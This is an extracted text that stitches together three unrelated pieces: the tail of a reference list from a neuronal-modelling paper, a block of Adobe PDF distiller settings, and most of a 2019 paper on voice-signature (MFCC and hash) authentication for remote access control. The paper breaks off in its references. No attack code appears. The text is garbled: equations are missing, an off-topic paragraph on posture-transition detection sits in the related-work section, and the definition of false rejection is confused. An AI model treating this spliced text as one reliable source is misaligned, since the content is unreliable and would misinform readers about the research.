Kannimoola JM, Jayaraman B, Thampy P, Achuthan K. 2017. Temporal constrained objects: application and implementation. Computer Languages, Systems & Structures 49:82–100 DOI 10.1016/j.cl.2017.03.002. Koch C, Segev I. 1998. Methods in Neuronal Modeling: From Ions to Networks. Cambridge: MIT Press. Lago JM, Artalejo MR. 2001. A declarative framework for object-oriented programming with genetic inheritance. Theoretical Computer Science 269(1–2):363–417 DOI 10.1016/S0304-3975(01)00013-5. Leler W. 1987. Specification and generation of constraint satisfaction systems. D. Phil. thesis, University of North Carolina. Lloyd JW. 1994. Practical advantages of declarative programming. In: Joint Conference on Declarative Programming. Pisa: Italian Association for Logic Programming, 3–17. Lopez G, Freeman-benson B, Borning A. 1994. Constraints and object identity. In: Tokoro M, Pareschi R, eds. Object-Oriented Programming. ECOOP 1994. Vol. 821. Berlin, Heidelberg: Springer. Markram H. 2006. The blue brain project. Nature Reviews Neuroscience 7(2):153–160 DOI 10.1038/nrn1848. McCormick DA, Wang Z, Huguenard J. 1993. Neurotransmitter control of neocortical neuronal activity and excitability. Cerebral Cortex 3(5):387–398 DOI 10.1093/cercor/3.5.387. Medini C, Vijayan A, Angelo ED, Nair B, Diwakar S. 2014. Computationally efficient bio-realistic reconstructions of cerebellar neuron spiking patterns. In: Proceedings of the 2014 International Conference on Interdisciplinary Advances in Applied Computing—ICONIAAC’, New York. Vol. 14, 1–6. Nair M, Subramanyam K, Nair B, Diwakar S. 2014. Parameter optimization and nonlinear fitting for computational models in neuroscience on GPGPUs. In: Proceedings of IEEE International Conference on High Performance Computing and Applications (ICHPCA-2014). Piscataway: IEEE, 1–5. Naud R, Marcille N, Clopath C, Gerstner W. 2008. Firing patterns in the adaptive exponential integrate-and-fire model. Biological Cybernetics 99(4–5):335–347 DOI 10.1007/s00422-008-0264-7. Pushpendran M. 2006. A constraint object approach to systems biology. M.Sc. thesis, State University of New York. Raikov I. 2010. NineML—a description language for spiking neuron network modeling: the abstraction layer. BMC Neuroscience 11(Suppl 1):P66 DOI 10.1186/1471-2202-11-S1-P66. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 30/31 http://dx.doi.org/10.1007/3-540-45587-6_4 http://dx.doi.org/10.1016/j.cl.2017.03.002 http://dx.doi.org/10.1016/S0304-3975(01)00013-5 http://dx.doi.org/10.1038/nrn1848 http://dx.doi.org/10.1093/cercor/3.5.387 http://dx.doi.org/10.1007/s00422-008-0264-7 http://dx.doi.org/10.1186/1471-2202-11-S1-P66 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Ray S, Bhalla US. 2008. PyMOOSE: interoperable scripting in Python for MOOSE. Frontiers in Neuroinformatics 2:6 DOI 10.3389/neuro.11.006.2008. Reiner MJ, Zimmer D. 2017. Object-oriented modelling of wind turbines and its application for control design based on nonlinear dynamic inversion. Mathematical and Computer Modelling of Dynamical Systems 23:319–340 DOI 10.1080/13873954.2017.1298627. Richmond P, Cope A, Gurney K, Allerton DJ. 2014. From model specification to simulation of biologically constrained networks of spiking neurons. Neuroinformatics 12(2):307–323 DOI 10.1007/s12021-013-9208-z. Roggeri L, Rivieccio B, Rossi P, D’Angelo E. 2008. Tactile stimulation evokes long-term synaptic plasticity in the granular layer of cerebellum. Journal of Neuroscience: The Official Journal of the Society for Neuroscience 28(25):6354–6359 DOI 10.1523/JNEUROSCI.5709-07.2008. Rolf CC. 2011. Parallelism in constraint programming. D. Phil. thesis, Lund University. Roth A, van Rossum MCW. 2009. Modeling synapses. In: Eric DS, ed. Computational Modeling Methods for Neuroscientists. Cambridge: MIT Press, 139–160. Solinas S, Nieus T, D’Angelo E. 2010. A realistic large-scale model of the cerebellum granular layer predicts circuit spatio-temporal filtering properties. Frontiers in Cellular Neuroscience 4:12 DOI 10.3389/fncel.2010.00012. Tambay PY. 2003. Constrained objects for modeling complex systems. D. Phil. thesis, State University of New York. Zaytsev YV, Morrison A. 2014. CyNEST: a maintainable Cython-based interface for the NEST simulator. Frontiers in Neuroinformatics 8:23 DOI 10.3389/fninf.2014.00023. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 31/31 http://dx.doi.org/10.3389/neuro.11.006.2008 http://dx.doi.org/10.1080/13873954.2017.1298627 http://dx.doi.org/10.1007/s12021-013-9208-z http://dx.doi.org/10.1523/JNEUROSCI.5709-07.2008 http://dx.doi.org/10.3389/fncel.2010.00012 http://dx.doi.org/10.3389/fninf.2014.00023 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Temporal constrained objects for modelling neuronal dynamics Introduction Background Methods Results Discussion Conclusion flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_d4brcbtmzzfcnhn3mfx5etocxu ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 69 A Secure Voice Signature Based Lightweight Authentication Approach for Remote Access Control Oladayo Olufemi Olakanmi Electrical and Electronic Engineering University of Ibadan Ibadan, Nigeria e-mail: Olakanmi.oladayo@ui.edu.ng Aminat Shodipo Embedded Systems and Security Research Group University of Ibadan Ibadan, Nigeria e-mail: Olakanmi.oladayo@ui.edu.ng Abstract—Crypto-authentication schemes become unreliable whenever the private key is compromised, making them unfit for any system or network that requires high level of confidentiality. Key compromise is inevitable due to the wider space of operability of key in most of the cryptography based authentication schemes. To improve the performance of any authentication system, there is need to narrow its key operability to the key owner, that is eliminating the influence of other parties in the key generation and operability. However, this is quite difficult especially for any network that is characterised with low computation and energy, and relied on the third party for key management. In this paper, we propose the adoption of Mel-Frequency Cepstral Coefficients (MFCC) based voice signature based authentication scheme with a taint of cryptography operation. The scheme extracts the user’s voice signature as the hash of the MFCC parameters of the voice and unique passcode which is used for the authentication. We used exclusive or to filter off remnant of noise from MFCC values without incurring extra hardware cost. The performance evaluation results show authentication accuracy of 87.8% at low computation cost and communication overhead. Keywords-MFCC, Authentication, Cryptosystem, Coding, Security, Access Control I. INTRODUCTION The adoption of cryptography in security system has not only enhanced the integrity of data and confidentiality but obviously contribute to the acceptability of most of the new technologies. However, cryptography based security schemes may not proffer universal security solution to most systems or networks. This is due to the restrictive processing power and memory resources, wider key generation procedure and operability that characterised these class of cryptograph based security solutions. Therefore, they may not be effective for some systems. Besides, key distribution is another issue in cryptography based security solutions, although public-key infrastructure can be used to eliminate problems involved with key distribution, however it comes with a lot of overheads. Therefore, it is very important to find ways to reduce the overheads yet not sacrificing other aspects of security. The major loophole of cryptography security solutions is key escrow. This is a cryptographic key exchange process in which a key is held in escrow, or stored, by a third party. The problem with this, is that a lost key or compromised by its original user(s) may be used to decrypt encrypted material. Key escrow is proactive through key disclosure laws. That is, it anticipates the need for access to keys. However, it also introduces new risks like loss of keys and legal issues such as involuntary self-incrimination which are likened to security weakness. Recently, attention has been shifted to the adoption of biometric solution to mitigate some of the security loopholes of cryptography solution. Biometric based technique may limit key generation and operability only to the users. However, some biometric based techniques have shortcomings which hinder their adoptability in access control. For example, replication is one of the major vulnerabilities of finger print based authentication systems. A few methods for fingerprint replication such as the use of grease stains on the scanner and/or latent fingerprint, the use of live finger, which is forceful amputated from the owner. MFCC is one of the popular algorithms for extracting features of speech in voice recognition. It is common to normalise their values when adopted in speech recognition systems. Efforts had been made to improve on its algorithm such as raising the log-mel- amplitudes to a suitable power before taking the DCT so as to nullify the effect of additive noise [9]. In this paper we used exclusive or (xor) to nullify the remnant additive noise in MFCC values and generates unique voice signature of the user in the authentication phase. DOI: 10.21307/ijanmc-2019-049 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 70 II. RELATED WORK Voice recognition system has become a sophisticate security tool and a technology with great potential in authentication systems. It is the only biometric based recognition system that processes acoustic information contrary to other forms of biometrics, such as fingerprint, DNA, retina etc., that are image-based. Each human has their unique characteristic in speech and voice that can be captured and analyzed. Voice recognition system can be divided into two phases; identification and verification phases. Voice identification is used to decide who an unknown voice belongs to amongst a set of known speakers while voice verification accepts or rejects the identity claim of a speaker. Voice identification can also be sub-classified into text-dependent and text-independent identification. In text-dependent identification, the individual has to utter the same keyword both in the test and training phases. Meanwhile, text-independent identification properly identifies the speaker regardless of what is being said. Voice recognition system has a lot of applications, such as authentication in remote identification and verification, mobile banking, ATM transactions, and online transactions and reservations; information security in device logon, and application and database security; Law Enforcement such as forensic investigation, and surveillance applications. Several works had been done on voice recognition and its application to solve different access control problems. For example, Sidiqs et al. [1], proposed a speech recognition system to translate human speech to an action in machine. They used MFCC by splitting the input signal amplitudes into frames which are processed using the mel-filterbak. The results are made into a codebook which is used as an input symbol to form a model of every word. Jagan and Rameshin [3] also developed a MFCC and Dynamic Time Wrapping (DTW) based speech recognition system for feature extraction and pattern matching respectively. Drisya and Anish [2] used Bessel features as an alternative to MFCC and LPCC to develop a text-independent speaker identification system. The quasi-stationary nature of speech signal was represented by damped sinusoidal based function, and a Bessel features derived from the speech signal was used to create Gaussian mixture models for text independent speaker identification. Meanwhile, work in [4] introduced a new algorithm for extracting MFCC for speech recognition. The results showed that the new algorithm reduced the computation power and accuracy compared to the conventional algorithm. The ability to perform postural transitions such as sittostand is an accepted metric for functional independence. The number of transitions performed in real life situations provides useful clinical information for an individual recovering from lower extremity injury or surgery. Consequent to this, Sadra and Eric [5] proposed a new inertialsensor based approach to detect transitions using wavelet transform. Their approach is robust for supervised laboratory and ambient settings. Also, authors in [6] developed a speaker recognition system using a statistical model like Gaussian mixture model (GMM) to implement a recognizer. The features extracted from the speech signal were used to build a unique identity for each authorised user. Estimation and maximization algorithms were used for finding the maximum likelihood solution for a model with latent variables. Laryngeal diseases and vocal fold pathologies have strong impacts on the quality of the voice recognition system. In [7] a user friendly approach was proposed to discriminate between normal and abnormal voice. The feature extraction technique was applied on the voice signal in the time domain and in the frequency domain. Another work on voice recognition is speaker identification system proposed in [8]. In the work, a speaker recognition system was implemented using a combination of MFCC and Kekre’s Median Code book Generation Algorithm (KMCG). The MFCC algorithm was used for feature extraction while the KMCG algorithm plays important role in code book generation and feature matching. However, most of these works were directed to voice recognition systems. Our work is directed to how the voice signature can be combined with cryptography operation to evolve an efficient access control scheme with narrow operability to mitigate key compromise. III. VOICE SIGNATURE BASED AUTHENTICATION SCHEME FOR ACCESS CONTROL The voice signature based authentication scheme involves two phases; registration and authentication phases. The registration phase takes voice samples and pass codes of all the authorised individuals, processed it in order to reduce the overall bulk and complexity, then extracts MFCC (Mel-Frequency Cepstral Coefficients) before generating the voice signature. This phase is sub-divided into six divisions; elimination of silent frame, framing, hamming windowing, MFCC generation, and voice signature generation. Meanwhile, the verification phase regenerates the user’s voice signature and compare it with all the encrypted voice signature stored in the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 71 memory of the access point’s memory using the k- means algorithm and correlation coefficient. Figure 1. Model of the remote voice based access control A. Registration Phase In the registration phase, voice samples are collected from a number of authorised users by the remote system. These voice samples are then pre- processed and their voice signature are obtained, encrypted and stored in the memory of the access control unit of the remote system. This stage consists of six sub-stages which are described below. To generate the voice signature all the stages must be executed in that order. 1) Elimination of silent frames It is pertinent to remove silent frames when processing speech in order to reduce the overall bulk and complexity of the speech signal. It is known that when humans are talking, it is very impossible not to have gaps or pauses in between words and sentences hence the importance of this phase. These gaps and pauses in the middle of speech increase the speech length or the number of frames to be processed, it therefore important to remove them. After proper studying of the spectrogram of speech, the amplitude for silent frames was pegged at 0.02 hence frames with amplitude less than 0.02 are removed. 2) Framing Framing sub-stage divides the continuous speech signal into frames of B samples, with adjacent frames being separated by A where . First frame consists of first B samples. Then, second frame begins with A samples after the first frame, and overlaps it by samples and so on. This continues until all the speech is accounted within one or more frames. Typically, B and A are chosen as 256 and 128 respectively. Figure 2 shows a speech signal after it has been framed. Figure 2. Speech signal after undergoing framing 3) Hamming Windowing After framing, Hamming windowing, as shown in Figure 4, is now used to tape the voice signal to zero at the beginning and the end, thereby reducing discontinuities in the signal. This helps to focus on the information at the centre of the frame as shown in Figure 4. For example, if the window is defined as and the speech signal as then the resultant signal after windowing is the signal defined as: . In this work, we used a hamming window of the form: (1) Figure 3. Hamming window before applying it on speech signal Figure 4. Speech signal after applying the Hamming Window International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 72 4) Fast Fourier Transform(FFT) FFT is then used to transform the speech signal from time domain to frequency domain in order to easily obtain the MFCC. The FFT is a fast algorithm to implement the Discrete Fourier Transform (DFT), which is defined on the set of N samples . gives the fast Fourier transform of frame In general are complex numbers and we only consider their absolute values (magnitudes) because considering the phase produces very skewed results as shown in Figure 5 and 6. Figure 5. Audio signal with magnitude and phase Figure 6. Audio signal considering the magnitude only 5) Mel-Frequency Cepstral Coefficient Out of all the feature extraction algorithms that are available, MFCC is commonly used because of the way it closely mimics the natural human auditory system. The mel-frequency scale is a linear frequency spacing below 1000 Hz and a logarithmic spacing above 1000 Hz. The best approach to simulate the subjective spectrum is to use a filter bank, spaced uniformly on the spectral properties of the signal for the given frame analysis. The Mel spectrum coefficients are converted back to time domain using the Discrete Cosine Transform (DCT ). The MFCC is calculated as: ; 0 ≤ n ≤ k – 1 (2) The first component is excluded from the DCT since it represents the mean value of the input signal and hence carries little speaker specific information [3]. Figure 7. Mel-filter bank 6) Voice Signature generation After obtaining the MFCC values, the access control unit then selects the maximum value and minimum value as the MFCC of the user, and calculate the user’s voice signature as the encryption of hash of the MFCC and passcode of the user. That is, voice signature is generated as: = (3) The operator acts as a noise filter since the two MFCC values and includes the same additive noise and xor operator is mutually exclusive. 7) Authentication Phase To access the system, the scheme requests for the user’s voice signal through the mobile device in order to re-generate an access voice signature. It then compares the re-generated access voice signature with all the voice signatures in the memory in order to authenticate the user. IV. PERFORMANCE EVALUATION A. Experimental setup One hundred and fifty two tests using 5 different users of mixed sex were used to test the efficiency of the voice based authentication scheme. Voice signatures of the five users (2 females and 3 males) saying the same sentence were extracted. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 73 TABLE I. PERFORMANCE EVALUATION OF VOICE SIGNATURE BASED AUTHENTICATION APPROACH Trial No. of samples No.of False rejection No. of False acceptance % Accuracy User 1 30 3 1 87 User 2 30 3 2 83 User 3 30 2 0 93 User 4 30 1 1 93 User 5 32 4 2 83 Each person voice signature was matched with the rest of the voices signatures in the database. The accuracy of systems was determined in terms of false acceptances and false rejections. A false acceptance occurs when the system grants access to an unauthorised user while a false rejection occurs when the system denies the unauthorized user is granted access. The scheme was simulated on a simulation platform consisting of a mobile device (Samsung Galaxy S5 with a Quad-core 2.45 GHz processor, 2GB RAM, and Google Android 4.4.2 operating system, a PC with Intel(R) Core(TM) i5-7200U CPU @ 2.50 GHz processor as the remote access control system. We determine the computation and communication costs of the scheme. B. Result and Discussion The results of the performance of the scheme in terms of false acceptance and rejection ratios are shown in Table 1. It shows that the system is accurate with accuracy of 87.8%. Also, computation cost, in terms of the execution time by the scheme for points FFT, is obtained as shown in Figure 8. This shows that the computation cost increases as the number of users increases, and indicates that the scheme has low computation cost and can be easily adopted by any system that is characterised as computation and energy constraint system. Also, Figure 9 shows the energy consumption of the scheme in terms of number of cycles required. This also indicates that the proposed scheme is energy-aware since energy consumed by a processor is approximately proportional to number of cycles or frequency , and to the square of the processor voltage V [14]. Meanwhile, the communication overhead incurred for every authentication is 256 bits. This indicates that the scheme requires low bandwidth and there will never be congestion irrespective of the bandwidth of the communication channel. Figure 8. Computation cost (ms) Figure 9. Energy cost in terms of cycles V. CONCLUSION In this work, we demonstrated how voice signature can be used to developed access control scheme for remote system. We solved the effect of the additive noise on MFCC using to eliminate the congruent additive noise embedded in the maximum MFCC and minimum MFCC values. The MFCC, hash function and conventional pass-code are used generate voice signature from user’s voice signal. This is used to solve the problem of wider operability of key in cryptography based REFERENCES [1] Muslim Sidiq, Tjokorda Agung Budi W, Siti Saadah (2015). Design and Implementation of Voice Command Using MFCC and HMMs Method. 3rd International Conference on Information and Communication Technology ( ICoICT ). [2] Drisya Vasudev, Anish Babu (2014). Speaker identification using FBCC in Malayalam language. International Conference on Advances in Computing, Communications and Informatics (ICACCI). International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 74 [3] Jagan Mohan and Ramesh Babu(2014). Speech recognition using MFCC and DTW. 1st Int. Conference on Advances in Electrical Engineering, VIT, Vellore, India [4] Wei Han, Cheong-Fat Chan, Chiu-Sing Choy, Kong-Pang Pun (2006). An efficient MFCC extraction method in speech recognition. 2006 ISCAS, 